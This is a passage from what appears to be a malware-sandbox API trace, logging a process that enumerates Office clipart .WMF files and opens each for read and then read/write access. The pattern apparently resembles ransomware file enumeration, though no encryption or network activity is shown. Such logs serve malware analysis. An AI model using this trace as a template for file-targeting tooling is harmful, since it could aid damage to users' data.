dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.654] AreFileApisANSI () returned 1 [0103.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0103.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 69 [0103.654] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a94)) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0103.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x752, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01636_.WMF", cAlternateFileName="")) returned 1 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0103.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.656] AreFileApisANSI () returned 1 [0103.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0103.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0103.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.657] AreFileApisANSI () returned 1 [0103.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0103.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 69 [0103.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.658] GetFileType (hFile=0x27c) returned 0x1 [0103.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0103.658] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.658] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.658] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.658] CloseHandle (hObject=0x27c) returned 1 [0103.662] AreFileApisANSI () returned 1 [0103.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0103.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 69 [0103.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.662] GetFileType (hFile=0x27c) returned 0x1 [0103.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0103.662] CloseHandle (hObject=0x27c) returned 1 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0103.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0103.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.663] AreFileApisANSI () returned 1 [0103.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0103.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 69 [0103.664] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x752)) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0103.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.664] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01637_.WMF", cAlternateFileName="")) returned 1 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0103.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0103.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0103.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.665] AreFileApisANSI () returned 1 [0103.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0103.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.665] AreFileApisANSI () returned 1 [0103.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 69 [0103.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.666] GetFileType (hFile=0x27c) returned 0x1 [0103.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.666] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.667] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.667] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.667] CloseHandle (hObject=0x27c) returned 1 [0103.667] AreFileApisANSI () returned 1 [0103.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0103.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 69 [0103.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.667] GetFileType (hFile=0x27c) returned 0x1 [0103.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.667] CloseHandle (hObject=0x27c) returned 1 [0103.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.668] AreFileApisANSI () returned 1 [0103.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.668] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6c)) returned 1 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, 